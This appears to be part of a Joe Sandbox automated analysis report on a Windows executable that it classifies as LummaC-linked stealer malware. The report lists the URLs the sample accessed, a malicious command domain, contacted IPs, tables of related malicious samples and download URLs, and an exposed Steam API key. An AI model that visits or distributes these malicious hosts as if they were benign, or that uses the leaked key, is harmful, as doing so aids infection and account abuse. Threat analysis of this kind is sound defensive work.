                                                                                                                                                                https://recaptcha.net/recaptcha/;xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=enxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://steamcommunity.com/discussions/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://sputnik-1985.com/apiOSCzxNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://store.steampowered.com/stats/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://medal.tvxNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://broadcast.st.dl.eccdnx.comxNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngxNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&axNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://store.steampowered.com/steam_refunds/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://x1.c.lencr.org/0xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://x1.i.lencr.org/0xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchxNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=exNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://steamcommunity.com/workshop/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://login.steampowered.com/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbxNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.allxNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://store.steampowered.com/legal/xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviExNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoxNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&axNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://recaptcha.netxNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://upx.sf.netAmcache.hve.10.drfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://store.steampowered.com/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngxNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                http://127.0.0.1:27060xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgxNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=JWHwHdDIz5WW&l=exNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high

                                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                      104.102.49.254
                                                                                                                                                                                                                                      		steamcommunity.comUnited States
                                                                                                                                                                                                                                      		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                      104.21.80.1
                                                                                                                                                                                                                                      		sputnik-1985.comUnited States
                                                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                                      Analysis ID:1588972
                                                                                                                                                                                                                                      Start date and time:2025-01-11 07:47:40 +01:00
                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                      Overall analysis duration:0h 5m 33s
                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                      Number of analysed new started processes analysed:16
                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                      Sample name:xNuh0DUJaG.exe
                                                                                                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                                                                                                      Original Sample Name:9b3e0c8c483f0708b9dc9c18ce46d0bc.exe
                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@2/5@11/2
                                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                      • Successful, ratio: 94%
                                                                                                                                                                                                                                      • Number of executed functions: 19
                                                                                                                                                                                                                                      • Number of non-executed functions: 233
                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.45, 40.126.32.133, 52.149.20.212
                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                      01:48:33API Interceptor6x Sleep call for process: xNuh0DUJaG.exe modified
                                                                                                                                                                                                                                      01:48:57API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                      • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                                      http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                                      104.21.80.1NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                      • www.aziziyeescortg.xyz/2pcx/
                                                                                                                                                                                                                                      qlG7x91YXH.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                      • www.mzkd6gp5.top/0hqe/
                                                                                                                                                                                                                                      6uHfmjGMfL.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                                      • clientservices.sgoogleapis.observer/api/index.php
                                                                                                                                                                                                                                      http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • my.cradaygo.com/smmylet
                                                                                                                                                                                                                                      SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                      • www.dejikenkyu.cyou/pmpa/
                                                                                                                                                                                                                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                                      • hiranetwork.com/administrator/index.php
                                                                                                                                                                                                                                      downloader2.htaGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                      • 2k8u3.org/wininit.exe

                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      steamcommunity.comSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      HouseholdsClicking.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      davies.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      FeedStation.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      sputnik-1985.comSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.32.1
                                                                                                                                                                                                                                      HouseholdsClicking.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.64.1
                                                                                                                                                                                                                                      FeedStation.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.112.1
                                                                                                                                                                                                                                      DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.21.64.1
                                                                                                                                                                                                                                      DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.21.112.1
                                                                                                                                                                                                                                      fghj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                      CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.21.48.1
                                                                                                                                                                                                                                      filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.48.1
                                                                                                                                                                                                                                      expt64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.64.1

                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      CLOUDFLARENETUSc7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                      • 104.21.16.1
                                                                                                                                                                                                                                      grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                      14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                      • 104.21.32.1
                                                                                                                                                                                                                                      Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                      • 104.21.64.1
                                                                                                                                                                                                                                      fqbVL4XxCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                      • 104.21.112.1
                                                                                                                                                                                                                                      JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                                                                      ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                      • 104.21.32.1
                                                                                                                                                                                                                                      962Zrwh5bU.exeGet hashmaliciousAzorultBrowse
                                                                                                                                                                                                                                      • 104.21.75.48
                                                                                                                                                                                                                                      AKAMAI-ASUSSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      Bontrageroutdoors_Project_Update_202557516.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 96.17.64.171
                                                                                                                                                                                                                                      invoice_AG60538.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 96.17.64.171
                                                                                                                                                                                                                                      Message 2.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.102.34.105
                                                                                                                                                                                                                                      frosty.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                      • 95.101.248.46
                                                                                                                                                                                                                                      Message.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                                                                                      4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                      • 104.102.49.254

                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      Full-Ver_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      HouseholdsClicking.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      davies.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      • 104.21.80.1

                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                      Created / dropped Files

